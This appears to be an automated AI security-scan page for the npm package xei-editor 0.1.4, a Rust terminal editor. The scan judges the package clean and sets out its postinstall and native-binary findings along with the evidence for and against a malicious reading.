registry  /  xei-editor  /  0.1.4

xei-editor@0.1.4

xei (晴) — a modern Vim-like terminal editor in Rust

AI Security Review

scanned 8h ago · by lpm-firewall-ai

No confirmed malicious attack surface was established. The package ships and exposes a native terminal editor binary; the lifecycle script appears intended to fetch a matching package binary from GitHub releases but is broken and package-aligned.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install postinstall, or user runs xei CLI
Impact
User-invoked editor may read/write files the user opens; no unconsented exfiltration or persistence found.
Mechanism
native CLI editor with broken package-aligned binary downloader
Rationale
Static inspection found suspicious packaging primitives, but they are consistent with a Rust terminal editor distributed through npm and no concrete malicious behavior was present. The install hook is broken before it can download or write the binary, and the only network endpoint is the package's GitHub release path.
Evidence
package.jsoninstall.jsbin/xeiREADME.md~/.xei.toml
Network endpoints2
github.com/stremtec/xei/releases/download/v0.1.4/xei-${target}${EXE}.gzgit+https://github.com/stremtec/xei.git

Decision evidence

public snapshot
AI called this Clean at 86.0% confidence as Benign with low false-positive risk.
Evidence for block
  • package.json defines postinstall: node install.js
  • install.js contains package-aligned HTTPS download logic for a GitHub release binary
  • bin/xei is a shipped native Mach-O arm64 executable
Evidence against
  • install.js only references github.com/stremtec/xei release URL and local bin/ path
  • No source references to credential harvesting, shell startup/VCS hooks, AI-agent control files, or exfiltration endpoints
  • install.js has coding errors that prevent useful install-time behavior before network/file writes: EXE is used before initialization and platform/arch are not called
  • Binary strings show terminal editor/crossterm/editor-related content, with no suspicious URLs or secret paths found
  • README describes a Vim-like terminal editor and persistence only for package config ~/.xei.toml
Behavioral surface
Source
FilesystemNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 1.72 KB of source, external domains: github.com

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = node install.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node install.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
bin/xeiView file
path = bin/xei kind = native_binary sizeBytes = 989520 magicHex = [redacted]
Medium
Ships Native Binary

Package ships native binary artifacts.

bin/xeiView on unpkg

Findings

1 High3 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumShips Native Binarybin/xei
LowScripts Present
LowFilesystem
LowUrl Strings